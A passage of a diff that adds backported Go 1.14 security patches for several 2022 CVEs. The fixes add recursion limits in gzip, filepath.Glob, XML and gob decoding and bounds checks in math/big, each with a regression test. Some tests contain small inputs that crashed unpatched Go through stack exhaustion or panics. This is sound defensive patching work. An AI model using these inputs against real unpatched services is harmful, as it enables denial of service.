++	// Don't spam output with logs of queries containing semicolons.
++	backend.Config.ErrorLog = log.New(io.Discard, "", 0)
++	frontend.Config.ErrorLog = log.New(io.Discard, "", 0)
++
++	for _, test := range []struct {
++		rawQuery   string
++		cleanQuery string
++	}{{
++		rawQuery:   "a=1&a=2;b=3",
++		cleanQuery: "a=1",
++	}, {
++		rawQuery:   "a=1&a=%zz&b=3",
++		cleanQuery: "a=1&b=3",
++	}} {
++		res, err := frontend.Client().Get(frontend.URL + "?" + test.rawQuery)
++		if err != nil {
++			t.Fatalf("Get: %v", err)
++		}
++		defer res.Body.Close()
++		body, _ := io.ReadAll(res.Body)
++		wantQuery := test.rawQuery
++		if wantCleanQuery {
++			wantQuery = test.cleanQuery
++		}
++		if got, want := string(body), wantQuery; got != want {
++			t.Errorf("proxy forwarded raw query %q as %q, want %q", test.rawQuery, got, want)
++		}
++	}
++}
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch
new file mode 100644
index 0000000000..47313a547f
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch
@@ -0,0 +1,47 @@
+From 8d0bbb5a6280c2cf951241ec7f6579c90d38df57 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 10:55:08 +0530
+Subject: [PATCH] CVE-2022-30629
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c15a8e2dbb5ac376a6ed890735341b812d6b965c]
+CVE: CVE-2022-30629
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/crypto/tls/handshake_server_tls13.go | 14 ++++++++++++++
+ 1 file changed, 14 insertions(+)
+
+diff --git a/src/crypto/tls/handshake_server_tls13.go b/src/crypto/tls/handshake_server_tls13.go
+index 5432145..d91797e 100644
+--- a/src/crypto/tls/handshake_server_tls13.go
++++ b/src/crypto/tls/handshake_server_tls13.go
+@@ -9,6 +9,7 @@ import (
+ 	"crypto"
+ 	"crypto/hmac"
+ 	"crypto/rsa"
++	"encoding/binary"
+ 	"errors"
+ 	"hash"
+ 	"io"
+@@ -742,6 +743,19 @@ func (hs *serverHandshakeStateTLS13) sendSessionTickets() error {
+ 	}
+ 	m.lifetime = uint32(maxSessionTicketLifetime / time.Second)
+ 
++	// ticket_age_add is a random 32-bit value. See RFC 8446, section 4.6.1
++	// The value is not stored anywhere; we never need to check the ticket age
++	// because 0-RTT is not supported.
++	ageAdd := make([]byte, 4)
++	_, err = hs.c.config.rand().Read(ageAdd)
++	if err != nil {
++		return err
++	}
++	m.ageAdd = binary.LittleEndian.Uint32(ageAdd)
++
++	// ticket_nonce, which must be unique per connection, is always left at
++	// zero because we only ever send one ticket per connection.
++
+ 	if _, err := c.writeRecord(recordTypeHandshake, m.marshal()); err != nil {
+ 		return err
+ 	}
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch
new file mode 100644
index 0000000000..5dcfd27f16
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch
@@ -0,0 +1,116 @@
+From d10fc3a84e3344f2421c1dd3046faa50709ab4d5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 11:01:21 +0530
+Subject: [PATCH] CVE-2022-30631
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/0117dee7dccbbd7803d88f65a2ce8bd686219ad3]
+CVE: CVE-2022-30631
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/compress/gzip/gunzip.go      | 60 +++++++++++++++-----------------
+ src/compress/gzip/gunzip_test.go | 16 +++++++++
+ 2 files changed, 45 insertions(+), 31 deletions(-)
+
+diff --git a/src/compress/gzip/gunzip.go b/src/compress/gzip/gunzip.go
+index 924bce1..237b2b9 100644
+--- a/src/compress/gzip/gunzip.go
++++ b/src/compress/gzip/gunzip.go
+@@ -248,42 +248,40 @@ func (z *Reader) Read(p []byte) (n int, err error) {
+ 		return 0, z.err
+ 	}
+ 
+-	n, z.err = z.decompressor.Read(p)
+-	z.digest = crc32.Update(z.digest, crc32.IEEETable, p[:n])
+-	z.size += uint32(n)
+-	if z.err != io.EOF {
+-		// In the normal case we return here.
+-		return n, z.err
+-	}
++	for n == 0 {
++		n, z.err = z.decompressor.Read(p)
++		z.digest = crc32.Update(z.digest, crc32.IEEETable, p[:n])
++		z.size += uint32(n)
++		if z.err != io.EOF {
++			// In the normal case we return here.
++			return n, z.err
++		}
+ 
+-	// Finished file; check checksum and size.
+-	if _, err := io.ReadFull(z.r, z.buf[:8]); err != nil {
+-		z.err = noEOF(err)
+-		return n, z.err
+-	}
+-	digest := le.Uint32(z.buf[:4])
+-	size := le.Uint32(z.buf[4:8])
+-	if digest != z.digest || size != z.size {
+-		z.err = ErrChecksum
+-		return n, z.err
+-	}
+-	z.digest, z.size = 0, 0
++		// Finished file; check checksum and size.
++		if _, err := io.ReadFull(z.r, z.buf[:8]); err != nil {
++			z.err = noEOF(err)
++			return n, z.err
++		}
++		digest := le.Uint32(z.buf[:4])
++		size := le.Uint32(z.buf[4:8])
++		if digest != z.digest || size != z.size {
++			z.err = ErrChecksum
++			return n, z.err
++		}
++		z.digest, z.size = 0, 0
+ 
+-	// File is ok; check if there is another.
+-	if !z.multistream {
+-		return n, io.EOF
+-	}
+-	z.err = nil // Remove io.EOF
++		// File is ok; check if there is another.
++		if !z.multistream {
++			return n, io.EOF
++		}
++		z.err = nil // Remove io.EOF
+ 
+-	if _, z.err = z.readHeader(); z.err != nil {
+-		return n, z.err
++		if _, z.err = z.readHeader(); z.err != nil {
++			return n, z.err
++		}
+ 	}
+ 
+-	// Read from next file, if necessary.
+-	if n > 0 {
+-		return n, nil
+-	}
+-	return z.Read(p)
++	return n, nil
+ }
+ 
+ // Close closes the Reader. It does not close the underlying io.Reader.
+diff --git a/src/compress/gzip/gunzip_test.go b/src/compress/gzip/gunzip_test.go
+index 1b01404..95220ae 100644
+--- a/src/compress/gzip/gunzip_test.go
++++ b/src/compress/gzip/gunzip_test.go
+@@ -516,3 +516,19 @@ func TestTruncatedStreams(t *testing.T) {
+ 		}
+ 	}
+ }
++
++func TestCVE202230631(t *testing.T) {
++	var empty = []byte{0x1f, 0x8b, 0x08, 0x00, 0xa7, 0x8f, 0x43, 0x62, 0x00,
++		0x03, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
++	r := bytes.NewReader(bytes.Repeat(empty, 4e6))
++	z, err := NewReader(r)
++	if err != nil {
++		t.Fatalf("NewReader: got %v, want nil", err)
++	}
++	// Prior to CVE-2022-30631 fix, this would cause an unrecoverable panic due
++	// to stack exhaustion.
++	_, err = z.Read(make([]byte, 10))
++	if err != io.EOF {
++		t.Errorf("Reader.Read: got %v, want %v", err, io.EOF)
++	}
++}
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch
new file mode 100644
index 0000000000..c54ef56a0e
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch
@@ -0,0 +1,71 @@
+From 35d1dfe9746029aea9027b405c75555d41ffd2f8 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 13:12:40 +0530
+Subject: [PATCH] CVE-2022-30632
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/76f8b7304d1f7c25834e2a0cc9e88c55276c47df]
+CVE: CVE-2022-30632
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/path/filepath/match.go      | 16 +++++++++++++++-
+ src/path/filepath/match_test.go | 10 ++++++++++
+ 2 files changed, 25 insertions(+), 1 deletion(-)
+
+diff --git a/src/path/filepath/match.go b/src/path/filepath/match.go
+index 46badb5..ba68daa 100644
+--- a/src/path/filepath/match.go
++++ b/src/path/filepath/match.go
+@@ -232,6 +232,20 @@ func getEsc(chunk string) (r rune, nchunk string, err error) {
+ // The only possible returned error is ErrBadPattern, when pattern
+ // is malformed.
+ func Glob(pattern string) (matches []string, err error) {
++	return globWithLimit(pattern, 0)
++}
++
++func globWithLimit(pattern string, depth int) (matches []string, err error) {
++	// This limit is used prevent stack exhaustion issues. See CVE-2022-30632.
++	const pathSeparatorsLimit = 10000
++	if depth == pathSeparatorsLimit {
++		return nil, ErrBadPattern
++	}
++
++	// Check pattern is well-formed.
++	if _, err := Match(pattern, ""); err != nil {
++		return nil, err
++	}
+ 	if !hasMeta(pattern) {
+ 		if _, err = os.Lstat(pattern); err != nil {
+ 			return nil, nil
+@@ -257,7 +271,7 @@ func Glob(pattern string) (matches []string, err error) {
+ 	}
+ 
+ 	var m []string
+-	m, err = Glob(dir)
++	m, err = globWithLimit(dir, depth+1)
+ 	if err != nil {
+ 		return
+ 	}
+diff --git a/src/path/filepath/match_test.go b/src/path/filepath/match_test.go
+index b865762..c37c812 100644
+--- a/src/path/filepath/match_test.go
++++ b/src/path/filepath/match_test.go
+@@ -154,6 +154,16 @@ func TestGlob(t *testing.T) {
+ 	}
+ }
+ 
++func TestCVE202230632(t *testing.T) {
++	// Prior to CVE-2022-30632, this would cause a stack exhaustion given a
++	// large number of separators (more than 4,000,000). There is now a limit
++	// of 10,000.
++	_, err := Glob("/*" + strings.Repeat("/", 10001))
++	if err != ErrBadPattern {
++		t.Fatalf("Glob returned err=%v, want ErrBadPattern", err)
++	}
++}
++
+ func TestGlobError(t *testing.T) {
+ 	_, err := Glob("[]")
+ 	if err == nil {
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch
new file mode 100644
index 0000000000..c16cb5f50c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch
@@ -0,0 +1,131 @@
+From ab6e2ffdcab0501bcc2de4b196c1c18ae2301d4b Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 13:29:55 +0530
+Subject: [PATCH] CVE-2022-30633
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/2678d0c957193dceef336c969a9da74dd716a827]
+CVE: CVE-2022-30633
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/encoding/xml/read.go      | 27 +++++++++++++++++++--------
+ src/encoding/xml/read_test.go | 14 ++++++++++++++
+ 2 files changed, 33 insertions(+), 8 deletions(-)
+
+diff --git a/src/encoding/xml/read.go b/src/encoding/xml/read.go
+index 10a60ee..4ffed80 100644
+--- a/src/encoding/xml/read.go
++++ b/src/encoding/xml/read.go
+@@ -148,7 +148,7 @@ func (d *Decoder) DecodeElement(v interface{}, start *StartElement) error {
+ 	if val.Kind() != reflect.Ptr {
+ 		return errors.New("non-pointer passed to Unmarshal")
+ 	}
+-	return d.unmarshal(val.Elem(), start)
++	return d.unmarshal(val.Elem(), start, 0)
+ }
+ 
+ // An UnmarshalError represents an error in the unmarshaling process.
+@@ -304,8 +304,15 @@ var (
+ 	textUnmarshalerType = reflect.TypeOf((*encoding.TextUnmarshaler)(nil)).Elem()
+ )
+ 
++const maxUnmarshalDepth = 10000
++
++var errExeceededMaxUnmarshalDepth = errors.New("exceeded max depth")
++
+ // Unmarshal a single XML element into val.
+-func (d *Decoder) unmarshal(val reflect.Value, start *StartElement) error {
++func (d *Decoder) unmarshal(val reflect.Value, start *StartElement, depth int) error {
++	if depth >= maxUnmarshalDepth {
++		return errExeceededMaxUnmarshalDepth
++	}
+ 	// Find start element if we need it.
+ 	if start == nil {
+ 		for {
+@@ -398,7 +405,7 @@ func (d *Decoder) unmarshal(val reflect.Value, start *StartElement) error {
+ 		v.Set(reflect.Append(val, reflect.Zero(v.Type().Elem())))
+ 
+ 		// Recur to read element into slice.
+-		if err := d.unmarshal(v.Index(n), start); err != nil {
++		if err := d.unmarshal(v.Index(n), start, depth+1); err != nil {
+ 			v.SetLen(n)
+ 			return err
+ 		}
+@@ -521,13 +528,15 @@ Loop:
+ 		case StartElement:
+ 			consumed := false
+ 			if sv.IsValid() {
+-				consumed, err = d.unmarshalPath(tinfo, sv, nil, &t)
++				// unmarshalPath can call unmarshal, so we need to pass the depth through so that
++				// we can continue to enforce the maximum recusion limit.
++				consumed, err = d.unmarshalPath(tinfo, sv, nil, &t, depth)
+ 				if err != nil {
+ 					return err
+ 				}
+ 				if !consumed && saveAny.IsValid() {
+ 					consumed = true
+-					if err := d.unmarshal(saveAny, &t); err != nil {
++					if err := d.unmarshal(saveAny, &t, depth+1); err != nil {
+ 						return err
+ 					}
+ 				}
+@@ -672,7 +681,7 @@ func copyValue(dst reflect.Value, src []byte) (err error) {
+ // The consumed result tells whether XML elements have been consumed
+ // from the Decoder until start's matching end element, or if it's
+ // still untouched because start is uninteresting for sv's fields.
+-func (d *Decoder) unmarshalPath(tinfo *typeInfo, sv reflect.Value, parents []string, start *StartElement) (consumed bool, err error) {
++func (d *Decoder) unmarshalPath(tinfo *typeInfo, sv reflect.Value, parents []string, start *StartElement, depth int) (consumed bool, err error) {
+ 	recurse := false
+ Loop:
+ 	for i := range tinfo.fields {
+@@ -687,7 +696,7 @@ Loop:
+ 		}
+ 		if len(finfo.parents) == len(parents) && finfo.name == start.Name.Local {
+ 			// It's a perfect match, unmarshal the field.
+-			return true, d.unmarshal(finfo.value(sv), start)
++			return true, d.unmarshal(finfo.value(sv), start, depth+1)
+ 		}
+ 		if len(finfo.parents) > len(parents) && finfo.parents[len(parents)] == start.Name.Local {
+ 			// It's a prefix for the field. Break and recurse
+@@ -716,7 +725,9 @@ Loop:
+ 		}
+ 		switch t := tok.(type) {
+ 		case StartElement:
+-			consumed2, err := d.unmarshalPath(tinfo, sv, parents, &t)
++			// the recursion depth of unmarshalPath is limited to the path length specified
++			// by the struct field tag, so we don't increment the depth here.
++			consumed2, err := d.unmarshalPath(tinfo, sv, parents, &t, depth)
+ 			if err != nil {
+ 				return true, err
+ 			}
+diff --git a/src/encoding/xml/read_test.go b/src/encoding/xml/read_test.go
+index 8c2e70f..6a20b1a 100644
+--- a/src/encoding/xml/read_test.go
++++ b/src/encoding/xml/read_test.go
+@@ -5,6 +5,7 @@
+ package xml
+ 
+ import (
++	"errors"
+ 	"io"
+ 	"reflect"
+ 	"strings"
+@@ -1079,3 +1080,16 @@ func TestUnmarshalWhitespaceAttrs(t *testing.T) {
+ 		t.Fatalf("whitespace attrs: Unmarshal:\nhave: %#+v\nwant: %#+v", v, want)
+ 	}
+ }
++
++func TestCVE202228131(t *testing.T) {
++	type nested struct {
++		Parent *nested `xml:",any"`
++	}
++	var n nested
++	err := Unmarshal(bytes.Repeat([]byte("<a>"), maxUnmarshalDepth+1), &n)
++	if err == nil {
++		t.Fatal("Unmarshal did not fail")
++	} else if !errors.Is(err, errExeceededMaxUnmarshalDepth) {
++		t.Fatalf("Unmarshal unexpected error: got %q, want %q", err, errExeceededMaxUnmarshalDepth)
++	}
++}
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch
new file mode 100644
index 0000000000..73959f70fa
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch
@@ -0,0 +1,120 @@
+From fdd4316737ed5681689a1f40802ffa0805e5b11c Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 26 Aug 2022 12:17:05 +0530
+Subject: [PATCH] CVE-2022-30635
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/cd54600b866db0ad068ab8df06c7f5f6cb55c9b3]
+CVE-2022-30635
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/encoding/gob/decode.go         | 19 ++++++++++++-------
+ src/encoding/gob/gobencdec_test.go | 24 ++++++++++++++++++++++++
+ 2 files changed, 36 insertions(+), 7 deletions(-)
+
+diff --git a/src/encoding/gob/decode.go b/src/encoding/gob/decode.go
+index d2f6c74..0e0ec75 100644
+--- a/src/encoding/gob/decode.go
++++ b/src/encoding/gob/decode.go
+@@ -871,8 +871,13 @@ func (dec *Decoder) decOpFor(wireId typeId, rt reflect.Type, name string, inProg
+ 	return &op
+ }
+ 
++var maxIgnoreNestingDepth = 10000
++
+ // decIgnoreOpFor returns the decoding op for a field that has no destination.
+-func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp) *decOp {
++func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp, depth int) *decOp {
++	if depth > maxIgnoreNestingDepth {
++		error_(errors.New("invalid nesting depth"))
++	}
+ 	// If this type is already in progress, it's a recursive type (e.g. map[string]*T).
+ 	// Return the pointer to the op we're already building.
+ 	if opPtr := inProgress[wireId]; opPtr != nil {
+@@ -896,7 +901,7 @@ func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp)
+ 			errorf("bad data: undefined type %s", wireId.string())
+ 		case wire.ArrayT != nil:
+ 			elemId := wire.ArrayT.Elem
+-			elemOp := dec.decIgnoreOpFor(elemId, inProgress)
++			elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
+ 			op = func(i *decInstr, state *decoderState, value reflect.Value) {
+ 				state.dec.ignoreArray(state, *elemOp, wire.ArrayT.Len)
+ 			}
+@@ -904,15 +909,15 @@ func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp)
+ 		case wire.MapT != nil:
+ 			keyId := dec.wireType[wireId].MapT.Key
+ 			elemId := dec.wireType[wireId].MapT.Elem
+-			keyOp := dec.decIgnoreOpFor(keyId, inProgress)
+-			elemOp := dec.decIgnoreOpFor(elemId, inProgress)
++			keyOp := dec.decIgnoreOpFor(keyId, inProgress, depth+1)
++			elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
+ 			op = func(i *decInstr, state *decoderState, value reflect.Value) {
+ 				state.dec.ignoreMap(state, *keyOp, *elemOp)
+ 			}
+ 
+ 		case wire.SliceT != nil:
+ 			elemId := wire.SliceT.Elem
+-			elemOp := dec.decIgnoreOpFor(elemId, inProgress)
++			elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
+ 			op = func(i *decInstr, state *decoderState, value reflect.Value) {
+ 				state.dec.ignoreSlice(state, *elemOp)
+ 			}
+@@ -1073,7 +1078,7 @@ func (dec *Decoder) compileSingle(remoteId typeId, ut *userTypeInfo) (engine *de
+ func (dec *Decoder) compileIgnoreSingle(remoteId typeId) *decEngine {
+ 	engine := new(decEngine)
+ 	engine.instr = make([]decInstr, 1) // one item
+-	op := dec.decIgnoreOpFor(remoteId, make(map[typeId]*decOp))
++	op := dec.decIgnoreOpFor(remoteId, make(map[typeId]*decOp), 0)
+ 	ovfl := overflow(dec.typeString(remoteId))
+ 	engine.instr[0] = decInstr{*op, 0, nil, ovfl}
+ 	engine.numInstr = 1
+@@ -1118,7 +1123,7 @@ func (dec *Decoder) compileDec(remoteId typeId, ut *userTypeInfo) (engine *decEn
+ 		localField, present := srt.FieldByName(wireField.Name)
+ 		// TODO(r): anonymous names
+ 		if !present || !isExported(wireField.Name) {
+-			op := dec.decIgnoreOpFor(wireField.Id, make(map[typeId]*decOp))
++			op := dec.decIgnoreOpFor(wireField.Id, make(map[typeId]*decOp), 0)
+ 			engine.instr[fieldnum] = decInstr{*op, fieldnum, nil, ovfl}
+ 			continue
+ 		}
+diff --git a/src/encoding/gob/gobencdec_test.go b/src/encoding/gob/gobencdec_test.go
+index 6d2c8db..1b52ecc 100644
+--- a/src/encoding/gob/gobencdec_test.go
++++ b/src/encoding/gob/gobencdec_test.go
+@@ -12,6 +12,7 @@ import (
+ 	"fmt"
+ 	"io"
+ 	"net"
++	"reflect"
+ 	"strings"
+ 	"testing"
+ 	"time"
+@@ -796,3 +797,26 @@ func TestNetIP(t *testing.T) {
+ 		t.Errorf("decoded to %v, want 1.2.3.4", ip.String())
+ 	}
+ }
++
++func TestIngoreDepthLimit(t *testing.T) {
++	// We don't test the actual depth limit because it requires building an
++	// extremely large message, which takes quite a while.
++	oldNestingDepth := maxIgnoreNestingDepth
++	maxIgnoreNestingDepth = 100
++	defer func() { maxIgnoreNestingDepth = oldNestingDepth }()
++	b := new(bytes.Buffer)
++	enc := NewEncoder(b)
++	typ := reflect.TypeOf(int(0))
++	nested := reflect.ArrayOf(1, typ)
++	for i := 0; i < 100; i++ {
++		nested = reflect.ArrayOf(1, nested)
++	}
++	badStruct := reflect.New(reflect.StructOf([]reflect.StructField{{Name: "F", Type: nested}}))
++	enc.Encode(badStruct.Interface())
++	dec := NewDecoder(b)
++	var output struct{ Hello int }
++	expectedErr := "invalid nesting depth"
++	if err := dec.Decode(&output); err == nil || err.Error() != expectedErr {
++		t.Errorf("Decode didn't fail with depth limit of 100: want %q, got %q", expectedErr, err)
++	}
++}
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch
new file mode 100644
index 0000000000..aab98e99fd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch
@@ -0,0 +1,49 @@
+From 0fe3adec199e8cd2c101933f75d8cd617de70350 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 26 Aug 2022 12:48:13 +0530
+Subject: [PATCH] CVE-2022-32148
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ed2f33e1a7e0d18f61bd56f7ee067331d612c27e]
+CVE: CVE-2022-32148
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/net/http/header.go      | 6 ++++++
+ src/net/http/header_test.go | 5 +++++
+ 2 files changed, 11 insertions(+)
+
+diff --git a/src/net/http/header.go b/src/net/http/header.go
+index b9b5391..221f613 100644
+--- a/src/net/http/header.go
++++ b/src/net/http/header.go
+@@ -100,6 +100,12 @@ func (h Header) Clone() Header {
+ 	sv := make([]string, nv) // shared backing array for headers' values
+ 	h2 := make(Header, len(h))
+ 	for k, vv := range h {
++		if vv == nil {
++			// Preserve nil values. ReverseProxy distinguishes
++			// between nil and zero-length header values.
++			h2[k] = nil
++			continue
++		}
+ 		n := copy(sv, vv)
+ 		h2[k] = sv[:n:n]
+ 		sv = sv[n:]
+diff --git a/src/net/http/header_test.go b/src/net/http/header_test.go
+index 4789362..80c0035 100644
+--- a/src/net/http/header_test.go
++++ b/src/net/http/header_test.go
+@@ -235,6 +235,11 @@ func TestCloneOrMakeHeader(t *testing.T) {
+ 			in:   Header{"foo": {"bar"}},
+ 			want: Header{"foo": {"bar"}},
+ 		},
++		{
++			name: "nil value",
++			in:   Header{"foo": nil},
++			want: Header{"foo": nil},
++		},
+ 	}
+ 
+ 	for _, tt := range tests {
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch
new file mode 100644
index 0000000000..15fda7de1b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch
@@ -0,0 +1,113 @@
+From 027e7e1578d3d7614f7586eff3894b83d9709e14 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 29 Aug 2022 10:08:34 +0530
+Subject: [PATCH] CVE-2022-32189
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/703c8ab7e5ba75c95553d4e249309297abad7102]
+CVE: CVE-2022-32189
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/math/big/floatmarsh.go      |  7 +++++++
+ src/math/big/floatmarsh_test.go | 12 ++++++++++++
+ src/math/big/ratmarsh.go        |  6 ++++++
+ src/math/big/ratmarsh_test.go   | 12 ++++++++++++
+ 4 files changed, 37 insertions(+)
+
+diff --git a/src/math/big/floatmarsh.go b/src/math/big/floatmarsh.go
+index d1c1dab..990e085 100644
+--- a/src/math/big/floatmarsh.go
++++ b/src/math/big/floatmarsh.go
+@@ -8,6 +8,7 @@ package big
+ 
+ import (
+ 	"encoding/binary"
++	"errors"
+ 	"fmt"
+ )
+ 
+@@ -67,6 +68,9 @@ func (z *Float) GobDecode(buf []byte) error {
+ 		*z = Float{}
+ 		return nil
+ 	}
++	if len(buf) < 6 {
++		return errors.New("Float.GobDecode: buffer too small")
++	}
+ 
+ 	if buf[0] != floatGobVersion {
+ 		return fmt.Errorf("Float.GobDecode: encoding version %d not supported", buf[0])
+@@ -83,6 +87,9 @@ func (z *Float) GobDecode(buf []byte) error {
+ 	z.prec = binary.BigEndian.Uint32(buf[2:])
+ 
+ 	if z.form == finite {
++		if len(buf) < 10 {
++			return errors.New("Float.GobDecode: buffer too small for finite form float")
++		}
+ 		z.exp = int32(binary.BigEndian.Uint32(buf[6:]))
+ 		z.mant = z.mant.setBytes(buf[10:])
+ 	}
+diff --git a/src/math/big/floatmarsh_test.go b/src/math/big/floatmarsh_test.go
+index c056d78..401f45a 100644
+--- a/src/math/big/floatmarsh_test.go
++++ b/src/math/big/floatmarsh_test.go
+@@ -137,3 +137,15 @@ func TestFloatJSONEncoding(t *testing.T) {
+ 		}
+ 	}
+ }
++
++func TestFloatGobDecodeShortBuffer(t *testing.T) {
++	for _, tc := range [][]byte{
++		[]byte{0x1, 0x0, 0x0, 0x0},
++		[]byte{0x1, 0xfa, 0x0, 0x0, 0x0, 0x0},
++	} {
++		err := NewFloat(0).GobDecode(tc)
++		if err == nil {
++			t.Error("expected GobDecode to return error for malformed input")
++		}
++	}
++}
+diff --git a/src/math/big/ratmarsh.go b/src/math/big/ratmarsh.go
+index fbc7b60..56102e8 100644
+--- a/src/math/big/ratmarsh.go
++++ b/src/math/big/ratmarsh.go
+@@ -45,12 +45,18 @@ func (z *Rat) GobDecode(buf []byte) error {
+ 		*z = Rat{}
+ 		return nil
+ 	}
++	if len(buf) < 5 {
++		return errors.New("Rat.GobDecode: buffer too small")
++	}
+ 	b := buf[0]
+ 	if b>>1 != ratGobVersion {
+ 		return fmt.Errorf("Rat.GobDecode: encoding version %d not supported", b>>1)
+ 	}
+ 	const j = 1 + 4
+ 	i := j + binary.BigEndian.Uint32(buf[j-4:j])
++	if len(buf) < int(i) {
++		return errors.New("Rat.GobDecode: buffer too small")
++	}
+ 	z.a.neg = b&1 != 0
+ 	z.a.abs = z.a.abs.setBytes(buf[j:i])
+ 	z.b.abs = z.b.abs.setBytes(buf[i:])
+diff --git a/src/math/big/ratmarsh_test.go b/src/math/big/ratmarsh_test.go
+index 351d109..55a9878 100644
+--- a/src/math/big/ratmarsh_test.go
++++ b/src/math/big/ratmarsh_test.go
+@@ -123,3 +123,15 @@ func TestRatXMLEncoding(t *testing.T) {
+ 		}
+ 	}
+ }
++
++func TestRatGobDecodeShortBuffer(t *testing.T) {
++	for _, tc := range [][]byte{
++		[]byte{0x2},
++		[]byte{0x2, 0x0, 0x0, 0x0, 0xff},
++	} {
++		err := NewRat(1, 2).GobDecode(tc)
++		if err == nil {
++			t.Error("expected GobDecode to return error for malformed input")
++		}
++	}
++}
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch
new file mode 100644
index 0000000000..fac0ebe94c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch
@@ -0,0 +1,271 @@
+From e9017c2416ad0ef642f5e0c2eab2dbf3cba4d997 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Wed, 28 Sep 2022 11:18:51 -0400
+Subject: [PATCH] [release-branch.go1.18] regexp: limit size of parsed regexps
+
+Set a 128 MB limit on the amount of space used by []syntax.Inst
+in the compiled form corresponding to a given regexp.
+
+Also set a 128 MB limit on the rune storage in the *syntax.Regexp
+tree itself.
+
+Thanks to Adam Korczynski (ADA Logics) and OSS-Fuzz for reporting this issue.
+
+Fixes CVE-2022-41715.
+Updates #55949.
+Fixes #55950.
+
+Change-Id: Ia656baed81564436368cf950e1c5409752f28e1b
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1592136
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/438501
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/e9017c2416ad0ef642f5e0c2eab2dbf3cba4d997]
+CVE: CVE-2022-41715
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ src/regexp/syntax/parse.go      | 145 ++++++++++++++++++++++++++++++--
+ src/regexp/syntax/parse_test.go |  13 +--
+ 2 files changed, 148 insertions(+), 10 deletions(-)
+
+diff --git a/src/regexp/syntax/parse.go b/src/regexp/syntax/parse.go
